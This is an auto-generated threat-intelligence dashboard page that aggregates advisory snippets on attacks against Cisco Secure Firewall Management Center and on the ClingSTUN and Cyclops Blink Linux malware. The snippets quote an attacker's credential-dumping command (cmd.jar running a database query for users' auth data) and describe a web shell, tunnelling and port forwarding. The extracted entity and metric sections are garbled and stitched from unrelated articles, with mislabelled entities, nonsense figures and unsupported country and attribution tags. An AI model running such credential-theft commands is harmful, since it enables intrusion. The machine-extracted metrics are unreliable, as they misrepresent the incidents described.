Join Mikko Hyppönen and security leaders from the NFL, CHANEL, and Atlassian for a two-hour digital summit on what AI-speed attacks change, what defenders should stop doing, and how to validate, decide, fix, and re-validate at machine speed.
organisation
CHANEL
Join Mikko Hyppönen and security leaders from the NFL, CHANEL, and Atlassian for a two-hour digital summit on what AI-speed attacks change, what defenders should stop doing, and how to validate, decide, fix, and re-validate at machine speed.
organisation
Cisco FMC
"The discovery on Cisco FMC devices highlights the risk posed by compromised network-management infrastructure.
organisation
Hostname
…ommands to run on the system to conduct extensive reconnaissance in the victim organization’s environment:
Host names, IP addresses, directory listings
Active Directory (AD) service-accounts credentials, MySQL account credentials
Domain account information exfiltration
Computer object lists
Hostname to IP mappings spanning domain controllers, ADFS, exchanges, file servers, database servers, etc.
organisation
ADFS
…ommands to run on the system to conduct extensive reconnaissance in the victim organization’s environment:
Host names, IP addresses, directory listings
Active Directory (AD) service-accounts credentials, MySQL account credentials
Domain account information exfiltration
Computer object lists
Hostname to IP mappings spanning domain controllers, ADFS, exchanges, file servers, database servers, etc.
organisation
LOTL
…iminary stages of the attack entailed the threat actor gaining access to the system via static credentials (
CVE-2026-20316)
and then abusing legitimate built-in FMC tooling in living-off-the-land (LOTL) fashion to conduct extensive reconnaissance of the victim’s environment, deploy tunneling tools to maintain network access, harvest credentials, and build a target list of endpoints to encrypt/…
organisation
Secure Firewall Management Center
Cisco Talos is actively tracking the exploitation of two vulnerabilities in Cisco’s Secure Firewall Management Center (FMC) Software.
organisation
users;\
…JAR file (named “cmd[.]jar”) to query the compromised systems’ internal databases to obtain user authentication data and credentials:
/var/jre/bin/java -jar cmd.jar '/var/sf/bin/OmniQuery.pl -db mdb -e \'SELECT name, auth_data FROM users;\''
The JAR file is basically a command executor that obtains the command to be executed from its command line and executes it using /bin/sh -c <command>.
organisation
UAT-12197
cmd[.]jar
Db491181ece3f319de6567ab6f6daa90c6879911cd890155e6b7d8cc7a1a8c8e
UAT-12197
cmd[.]jar –
JAR-based command executor.
organisation
JSP
The web shell is JSP-based and Base64 decodes a parameter labelled “F6C1F0E7”, consisting of the class name to load in the JAVA process:
The web shell was used to place a malicious JAR file in the same directory.
organisation
JAR
The web shell is JSP-based and Base64 decodes a parameter labelled “F6C1F0E7”, consisting of the class name to load in the JAVA process:
The web shell was used to place a malicious JAR file in the same directory.
organisation
APT
Cluster #2: UAT-11823
Talos attributes this cluster of activity to UAT-11823, an advanced persistent threat (APT) actor, with high confidence.
financial
2 Cluster
Cluster #2: UAT-11823
Talos attributes this cluster of activity to UAT-11823, an advanced persistent threat (APT) actor, with high confidence.
organisation
Sandworm
APT
UAT-11823 overlaps in tooling with the
Sandworm
APT actor.
organisation
ELF
The threat actors downloaded a modular ELF implant from one of their Netcat C2 servers.
organisation
SSH
The threat actor also staged a SOCKS proxy and reverse-SSH tunnel to forward ports from internal hosts back to their own infrastructure.
organisation
license[.]tmp
Instrumenting operations via package_info.pl
After successfully accessing the device, the threat actor abused the legitimate utility “package_info.pl” to execute an attacker-crafted malicious “license[.]tmp” file with root privileges.
organisation
SMB
The following ports were forwarded: LDPA (389), LDAPS (636), Kerberos (88), SMB (445), NETBIOS (135), and WinRM (5985).
organisation
NETBIOS
The following ports were forwarded: LDPA (389), LDAPS (636), Kerberos (88), SMB (445), NETBIOS (135), and WinRM (5985).
data_breach
445 SMB
The following ports were forwarded: LDPA (389), LDAPS (636), Kerberos (88), SMB (445), NETBIOS (135), and WinRM (5985).
data_breach
135 NETBIOS
The following ports were forwarded: LDPA (389), LDAPS (636), Kerberos (88), SMB (445), NETBIOS (135), and WinRM (5985).
organisation
TAC
Customer support is also available by initiating a
TAC request
.
organisation
Attacker IP
43.204.2[.]142
UAT-11988
Attacker IP
address used to conduct intrusions.
Tactical Metrics
Metrics
infrastructure
Linux
Affected Product
Click for context!
ClingSTUN Linux Backdoor Abuses Public STUN Infrastructure.
A Linux malware strain named ClingSTUN exploits unpatched vulnerabilities in Internet-facing devices to establish persistent footholds and functions as a back-connect proxy backdoor.
Linux Backdoor Abuses STUN Protocol, Exploits Dozens of Flaws.
A recently discovered Linux backdoor turns infected systems into proxies that use the Session Traversal Utilities for NAT (STUN) protocol and contains exploits for self-propagation, FortiGuard Labs reports.
Hackers Exploit 24 IoT Vulnerabilities to Install ClingSTUN Linux Backdoor.
FortiGuard Labs has identified a
Linux backdoor
that exploits known vulnerabilities in internet-facing devices and converts infected systems into remotely controlled proxy nodes.
This allows the campaign to target different types of Linux-based IoT and networking equipment.
InfraTrust found that CVE-2026-31431, a Linux kernel privilege escalation vulnerability
dubbed "CopyFail"
and added to CISA's KEV catalog in May, now appears in 19 separate security advisories from six vendors.
Sophos Counter Threat Unit also analyzed a Linux implant named "timezone_check" recovered from compromised FMC appliances and identified it as a variant of Cyclops Blink, malware previously associated with the Sandworm threat group.
One Linux flaw spreads across 19 advisories
The September report also shows how supply-chain vulnerabilities in third-party components can create patching headaches across infrastructure products.
These changes potentially make Cyclops Blink compatible with a broader range of Linux-based network appliances and give attackers a more powerful platform for reconnaissance and intelligence collection, Sophos said.
The most significant change is that the malware now runs on 64-bit x86-64 Linux systems rather than the older 32-bit PowerPC architecture used by the original version.
It also uses generic Linux persistence techniques instead of modifying vendor-specific firmware.
Metrics
infrastructure
Macos
Affected Product
Related:
macOS Users Targeted by Fake Zoom Installer Carrying CloudSyncD Backdoor
Related:
AI Agents Aimed SQL Injection at US and Canadian Government Sites
Related:
Russian APT Star Blizzard Uses ‘RedFlick’ Infection Chain in Recent Attacks
Related:
Hackers Use ChatGPT Custom GPTs in ClickFix Attacks
Metrics
infrastructure
Ivanti
Affected Product
The malware’s operators were seen indiscriminately exploiting Avtech, EnGenius, D-Link, Hytec, Ivanti, Lantronix, Linear, MeiG, Realtek, Sunhillo, Tenda, and TP-Link flaws, and appear to be expanding their portfolio with other exploits as well.
Avtech
D-Link
EnGenius
Hytec
Ivanti
Lantronix
Linear
MeiG
Realtek
Sunhillo
Tenda
TP-Link
FortiGuard also found seven hardcoded exploits that ClingSTUN can use to spread to other vulnerable devices.
Metrics
infrastructure
10.0
Software Version
The attacks leverage
CVE-2026-20079
(CVSS score: 10.0), an authentication bypass vulnerability in the web interface of FMC software that could allow an unauthenticated, remote attacker to bypass authentication and execute script files on an affected device to obtain root access to the underlying operating system.
Metrics
financial
3
Cluster
Cluster #3: UAT-11988, a Qilin ransomware operator
A third cluster of activity entailed a ransomware operator (tracked as UAT-11988) logging into an FMC device with static credentials (
CVE-2026-20316
), performing extensive reconnaissance, domain enumerations, credential theft, and building a list of target endpoints within the compromised organization for encryption.
Metrics
financial
1
Cluster
Cluster #1: UAT-12197
This cluster of activity involved the successful exploitation of CVE-2026-20079 and the subsequent placement of a malicious web shell in the CSM Tomcat webroot directory.
Metrics
financial
2
Cluster
Cluster #2: UAT-11823
Talos attributes this cluster of activity to UAT-11823, an advanced persistent threat (APT) actor, with high confidence.
Metrics
data_breach
445
Smb
The following ports were forwarded: LDPA (389), LDAPS (636), Kerberos (88), SMB (445), NETBIOS (135), and WinRM (5985).
Metrics
data_breach
135
Netbios
The following ports were forwarded: LDPA (389), LDAPS (636), Kerberos (88), SMB (445), NETBIOS (135), and WinRM (5985).
Intelligence Sources
The Hacker News
2026-09-11
Dark Reading
2026-09-14
Talos Intelligence
2026-09-09
BleepingComputer
2026-09-23
InfraTrust report warns network management systems under attack
BleepingComputer
SecurityWeek
2026-10-05
AlienVault OTX
2026-10-05
A STUNning Disguise: Cling Malware Masquerades as Google
AlienVault OTX
HackRead
2026-10-05
AlienVault OTX
2026-10-05
ClingSTUN Linux Backdoor Abuses Public STUN Infrastructure
AlienVault OTX
Unpublish from Social Media?
Are you sure you want to delete this podcast video from all synchronized social networks (YouTube, Facebook, Threads)?
Important:
Due to Meta API restrictions, Instagram Reels cannot be deleted automatically via API by third-party apps.
View Profile to Delete Manually
View Profile to Delete Manually
Tactical Intelligence
Report Intelligence Issue
Podcast Options
Generate
Incident Version History
CURRENT VERSION
Last Updated: 2026-10-07T06:09
Comprehensive Tactical Telemetry
Highly Correlated Entities
108x
organisation
Identified Entity
ClingSTUN Linux Backdoor Abuses Public STUN Infrastructure
entity
20x
attribution
Attributing Entity
Canadian Government Sites
authority
18x
timeline
Temporal Reference
October 5, 2026
date
16x
vulnerability
Exploited CVE
CVE-2021-35394
cve
9x
tactic
Cyber Operation Type
Botnet
tactic
7x
tactic
MITRE ATT&CK Technique
T1588.001 - Malware
technique
5x
target region
Target Country
China
country
4x
source region
Origin Country
Russian Federation
country
3x
infrastructure
Affected Product
Linux
software
3x
industry
Targeted Sector
Education
sector
3x
malware
Malware Payload
Qilin
tool
3x
financial
Cluster
3
cluster
2x
general metric
Advisories
14
advisories
2x
vulnerability
CVSS Score
10
score
2x
general metric
Cve-2026
20,316
cve-2026
Contextual Telemetry
Context Block
23 METRICS
threat actor
APT Group
Star Blizzard
actor
general metric
Amd X86
64
amd x86
general metric
Intel
80,386
intel
general metric
Iot Vulnerabilities
24
iot vulnerabilities
general metric
Separate Security Advisories
19
separate security advisories
general metric
Score
71
score
general metric
Security Advisories
34
security advisories
general metric
Critical Vulnerability
9,000
critical vulnerability
general metric
New Security Advisories
158
new security advisories
general metric
Vendors
17
vendors
general metric
Vulnerabilities
1,699
vulnerabilities
general metric
Exploited Vulnerabilities
1,000
exploited vulnerabilities
general metric
Cvss Score
5
cvss score
general metric
Bit
32
bit
general metric
Fraud Emails
1,000,000
fraud emails
general metric
Sep
11
sep
infrastructure
Software Version
10.0
version
general metric
F|/Bin
3,090
f|/bin
general metric
Ldpa
389
ldpa
general metric
Ldaps
636
ldaps
general metric
Kerberos
88
kerberos
data breach
Smb
445
smb
data breach
Netbios
135
netbios
Click on any entity below to view its context in the main text!
Selective Unpublish
Selecciona las redes de las que quieres eliminar esta publicación. El sistema intentará borrar el post real de la API y limpiará la base de datos para que puedas volver a lanzarlo.
By navigating this website, you accept the use of strictly necessary technical cookies for session security and basic platform functionality. We do not use tracking or advertising cookies.
Read our Privacy Policy.